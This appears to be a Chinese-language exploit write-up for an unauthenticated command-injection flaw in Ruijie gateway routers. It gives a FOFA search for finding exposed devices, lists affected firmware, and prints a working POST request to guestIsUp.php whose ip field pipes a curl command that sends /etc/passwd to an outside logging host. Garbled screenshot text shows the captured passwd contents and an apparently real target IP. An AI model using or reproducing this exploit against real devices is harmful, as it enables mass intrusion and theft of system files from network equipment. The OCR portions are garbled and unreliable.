锐捷网关路由器通杀无条件 RCE 分析（含源码）
- 影响范围
- 漏洞详情

锐捷网关路由器通杀无条件 RCE 分析（含源码）

该漏洞属于未公开项目，仅在项目中使用。

fofa：

body= "<!-- @2000-2016 锐捷网络,电商论坛,官方商城,常见问题,人工客服,客服电话 : 4008 111 000,客服中心微信 -->"

锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图1

88,099 条匹结果 (条独立 IP),737ms, 关键词搜索.

显示一年内数据, 点击 all 查看所有.

影响范围

全版本

锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图2

软件下载列表

RG-EG2100 系列全能 POE 网关 GoS11.9(4)B12 版本 (适用 EG2100

2020-03-20

RG-NBR-E 系列企业网关 GOS11.9(1)B11 软件版本 (适用于 NBR2100G - 日]

2018-10-27

RG-NBR-E 系列企业网关 GOS11.9(4)B11P1 软件版本 (适用于 NBR2100G-]

2020-01-09

RG-NBR-E 系列企业网关 RGoS11.92B11P2 软件版本 (适用于 NBR2100G - 日]

2019-08-23

RG-NBR-E 系列企业网关 RGOS11.92)B11P1 软件版本 (适用于 NB2100G - 日)]

2019-04-09

RG-NBR-E 系列企业网关 GOS11.9)B11P1 软件版本 (适用于 NBR2100G-)

2019-01-04

RG-NB-E 系列企业网 GOS11.90B28P1 软件版本 (适用于 NB2100G-]

2018-11-15

RG-EG2100 系列全能 POE 网 GoS11.9(1)B12 软件版本 (适用于 EG2100P

2018-11-26

RG-EG2100 系列全能 POE 网关 Gos11.94B11P1 软件版本 (适用 EG2100]

2020-01-10

RG-EG2100P 系列全能 POE 网关 GoS11.94B11 软件版本 (适用于 EG2100]

2019-11-06

漏洞详情

已超过付费时长，文档已自动免费公开

POST /guest\_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 56   mac=1&ip=127.0.0.1|curl xxx.dnslog.cn -F file='@/etc/passwd'

锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图3

BUpSUtEPDestonly6m

BurplntruderRepeaterWindowHelp

JOSEPH

ISON

Alerts

lntruder

Comparer

Repeater

Spider

Target

Projectoptions

Useroptions

Sequencer

Scanner

Extender

Decoder

Proxy

Targer:https://

4430

Cance

Response

Request

Raw

Hex

Headers

Hex

Params

Raw

HTTP/1.1200OK

Host:

:4430

Connection:close

Server:nginx

Date:Tue,12Jan202106:45:02GMT

Content-Length:75

Content-Type:text/html

Pragma:no-cache

Connection:close

Cache-Control:no-cache

x-Frame-Options:SAMEORIGIN

Upgrade-Insecure-Requests:1

x-Content-Type-options:nosniff

user-Agent:Mozilla/s.0Macintosh;ItelMacox11-

Applenebkit/537.36/

x-XSS-Protection:1;mode-block

Origin:https//113.98192.106:4430

Strict-Transport-securitymx-i

Content-Length:0

Content-Type:applicotion/x-w-form-urlencoded

Accept:

text/htm,plicatioco

p,imge/apgc/

sec-Fetch-site:same-origin

Sec-Fetch-Mode:navigate

Sec-Fetch-user:?1

Sec-Fetch-Dest:document

Referer:https://113.9819/u/ge

Accept-Language:zh-cn,zh;-.;-

Cookie:LOCAL-LANGCOOKIE-zh;UI-LOCAL.COOKIE-zh;

sysmode-sys-modex20gateway

ceye.io+-F+file%3D%27%40%FetcxzFpasswd%2

mac-1&ip-127.0.0.7ccurl+

0matches

Typeasearchterm

294bytes15,858milis

Done

锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图4

POST

2021-01-1206:09:36

curl/7.36.0

11912890

elte870d—

2cda213elte870d

http://————ceye.io/

91d51e9dContent-Di

sposition:fom-data

nare-“hle”tlenare

“passwd”Content-T

t:/:/bin/shnobody 锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图5

nt/bln/falsorgosm 锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图6

1000:1000:LInuxUso

ra/home/rgosm;/bi

n/shguostx:1001:100

1:LinuxUserua/home

guest:/bin/shsslypn:

m/home/sshpn//bi

1003:LInuxUsera:/ho

muitipart/form-data;

melposlgres:/bin/sh

boundary————

-ddd25dc3

POST

2021-01-1206:09:31

11912885

http://

91d51o9d

curV/736.0

dd25dc391d51o9d

3.cowo.lo/

锐捷网关路由器通杀无条件RCE分析（含源码） · 语雀 - 图7

getStatus.p

guestisup.php

.php

guestauth.php

guestauthInfo.php

php